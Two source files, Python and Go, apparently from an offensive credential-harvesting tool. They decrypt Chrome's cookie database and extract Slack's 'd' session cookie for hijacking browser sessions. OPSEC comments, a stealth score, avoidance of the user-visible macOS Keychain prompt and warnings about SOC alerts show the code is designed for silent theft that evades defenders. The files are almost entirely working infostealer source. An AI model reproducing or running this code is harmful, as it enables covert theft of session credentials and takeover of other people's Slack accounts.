File: ninloader/python/ninloader/collectors/slack/browser_cookies.py
"""Slack browser cookie collector — extracts d cookie via Chromium decrypt.

Extracts the Slack `d` session cookie from Chrome's encrypted Cookies database.
The `d` cookie is required alongside an xoxc token for Slack API calls using
browser session credentials.

OPSEC:
  - Windows/Linux: SILENT (DPAPI / hardcoded 'peanuts' key)
  - macOS: SKIPPED by default (Keychain prompt is user-visible)
  - NOTE: Using the d cookie for API calls may trigger SOC alerts
"""

from __future__ import annotations

from typing import List

from ..base import BaseCollector
from .. import CollectorRegistry
from ...types import CollectedToken, DiscoveredToken
from ...secure import secure
from ...platform_utils import chrome_user_data_dir, get_platform


_SLACK_HOST_PATTERNS = [".slack.com"]
_SLACK_COOKIE_NAMES = {"d"}


@CollectorRegistry.register
class SlackBrowserCookiesCollector(BaseCollector):
    service = "slack"
    source = "browser_cookies"
    stealth_score = 5
    requires = ["cryptography"]
    platforms = ["windows", "linux"]  # Skip macOS — Keychain prompt

    def discover(self) -> List[DiscoveredToken]:
        """Check if Chrome Cookies DB exists with Slack cookies."""
        results = []
        chrome_dir = chrome_user_data_dir()

        profiles = ["Default"] + [f"Profile {i}" for i in range(1, 10)]
        for profile in profiles:
            cookies_db = chrome_dir / profile / "Cookies"
            if not cookies_db.exists():
                cookies_db = chrome_dir / profile / "Network" / "Cookies"

            if cookies_db.exists():
                results.append(DiscoveredToken(
                    service=self.service,
                    source=self.source,
                    path=str(cookies_db),
                    account_hint=f"chrome:{profile}",
                    stealth_score=self.stealth_score,
                    details=(
                        "Slack d cookie (browser session); "
                        f"platform={get_platform()}"
                    ),
                ))

        return results

    def collect(self) -> List[CollectedToken]:
        """Extract and decrypt Slack d cookie from Chrome."""
        missing = self.check_dependencies()
        if missing:
            self._warn(
                f"Missing dependencies: {', '.join(missing)}. "
                f"Install with: pip install {' '.join(missing)}"
            )
            return []

        from ...core.chromium_decrypt import extract_cookies, get_chrome_key, DecryptError

        try:
            key = get_chrome_key(allow_prompt=False)
        except DecryptError as e:
            self._warn(f"Cannot get Chrome key: {e}")
            return []

        results = []
        profiles = ["Default"] + [f"Profile {i}" for i in range(1, 10)]

        for profile in profiles:
            try:
                cookies = extract_cookies(
                    profile=profile,
                    host_patterns=_SLACK_HOST_PATTERNS,
                    key=key,
                )
            except DecryptError as e:
                self._warn(f"Failed to extract cookies from {profile}: {e}")
                continue
            except Exception as e:
                self._warn(f"Unexpected error extracting from {profile}: {e}")
                continue

            # Filter to the d cookie
            d_cookies = [c for c in cookies if c["name"] in _SLACK_COOKIE_NAMES]

            if not d_cookies:
                continue

            for d_cookie in d_cookies:
                # The d cookie value is the browser session token
                # It's URL-encoded and starts with xoxd-
                d_value = d_cookie["value"]

                results.append(CollectedToken(
                    service=self.service,
                    source=self.source,
                    stealth_score=self.stealth_score,
                    access_token=secure(d_value),
                    extra={
                        "profile": profile,
                        "cookie_name": "d",
                        "host": d_cookie["host"],
                        "path": d_cookie["path"],
                        "secure": d_cookie["secure"],
                        "httponly": d_cookie["httponly"],
                        "platform": get_platform(),
                        "note": (
                            "d cookie for xoxc token API calls. "
                            "WARNING: Using this may trigger SOC alerts."
                        ),
                    },
                ))

                self._info(
                    f"Extracted Slack d cookie from chrome:{profile} "
                    f"(host={d_cookie['host']})"
                )

        return results

File: ninloader/go/collectors/slack/browser_cookies.go
//go:build !darwin

// Slack browser cookie collector — extracts d cookie via Chromium decrypt.
//
// Extracts the Slack `d` session cookie from Chrome's encrypted Cookies database.
// The `d` cookie is required alongside an xoxc token for Slack API calls using
// browser session credentials.
//
// OPSEC:
//   - Windows/Linux: SILENT (DPAPI / hardcoded 'peanuts' key)
//   - macOS: SKIPPED by default (Keychain prompt is user-visible)
//   - NOTE: Using the d cookie for API calls may trigger SOC alerts
package slack

import (
	"fmt"

	"github.com/ninken/ninloader-go/internal/chromium"
	"github.com/ninken/ninloader-go/internal/collector"
	"github.com/ninken/ninloader-go/internal/platform"
	"github.com/ninken/ninloader-go/internal/registry"
	"github.com/ninken/ninloader-go/internal/types"
)

var slackHostPatterns = []string{".slack.com"}
var slackCookieNameSet = map[string]struct{}{"d": {}}

func init() {
	registry.Register("slack", "browser_cookies", func() collector.Collector {
		return &BrowserCookiesCollector{
			BaseCollector: collector.BaseCollector{Svc: "slack", Src: "browser_cookies", Plats: []string{"linux", "windows"}},
		}
	})
}

// BrowserCookiesCollector extracts the Slack d session cookie from Chrome's
// encrypted Cookies database via the chromium package.
type BrowserCookiesCollector struct {
	collector.BaseCollector
}

func (c *BrowserCookiesCollector) Service() string    { return c.Svc }
func (c *BrowserCookiesCollector) Source() string      { return c.Src }
func (c *BrowserCookiesCollector) StealthScore() int   { return 5 }
func (c *BrowserCookiesCollector) Platforms() []string { return c.Plats }

// slackProfiles returns the list of Chrome profile directory names to scan.
func slackProfiles() []string {
	p := []string{"Default"}
	for i := 1; i <= 9; i++ {
		p = append(p, fmt.Sprintf("Profile %d", i))
	}
	return p
}

func (c *BrowserCookiesCollector) Discover() []*types.DiscoveredToken {
	var results []*types.DiscoveredToken
	chromeDir := platform.ChromeUserDataDir()

	for _, profile := range slackProfiles() {
		cookies, err := chromium.ExtractCookies(chromeDir, profile, slackHostPatterns, nil)
		if err != nil || len(cookies) == 0 {
			continue
		}

		results = append(results, &types.DiscoveredToken{
			Service:      c.Svc,
			Source:       c.Src,
			Path:         fmt.Sprintf("%s/%s/Cookies", chromeDir, profile),
			AccountHint:  fmt.Sprintf("chrome:%s", profile),
			StealthScore: c.StealthScore(),
			Details: fmt.Sprintf(
				"Slack d cookie (browser session); platform=%s",
				platform.Platform(),
			),
		})
	}

	return results
}

func (c *BrowserCookiesCollector) Collect() []*types.CollectedToken {
	chromeDir := platform.ChromeUserDataDir()

	var results []*types.CollectedToken

	for _, profile := range slackProfiles() {
		cookies, err := chromium.ExtractCookies(chromeDir, profile, slackHostPatterns, nil)
		if err != nil {
			c.Warn(fmt.Sprintf("Failed to extract cookies from %s: %v", profile, err))
			continue
		}

		// Filter to the d cookie.
		var dCookies []chromium.Cookie
		for _, ck := range cookies {
			if _, ok := slackCookieNameSet[ck.Name]; ok {
				dCookies = append(dCookies, ck)
			}
		}

		if len(dCookies) == 0 {
			continue
		}

		for _, dCookie := range dCookies {
			// The d cookie value is the browser session token.
			// It's URL-encoded and starts with xoxd-.
			tok := types.NewCollectedToken(c.Svc, c.Src, c.StealthScore())
			tok.AccessToken = types.Secure(dCookie.Value)
			tok.Extra["profile"] = profile
			tok.Extra["cookie_name"] = "d"
			tok.Extra["host"] = dCookie.Host
			tok.Extra["path"] = dCookie.Path
			tok.Extra["secure"] = dCookie.Secure
			tok.Extra["httponly"] = dCookie.HTTPOnly
			tok.Extra["platform"] = platform.Platform()
			tok.Extra["note"] = "d cookie for xoxc token API calls. WARNING: Using this may trigger SOC alerts."

			results = append(results, tok)

			c.Info(fmt.Sprintf(
				"Extracted Slack d cookie from chrome:%s (host=%s)",
				profile, dCookie.Host,
			))
		}
	}

	return results
}
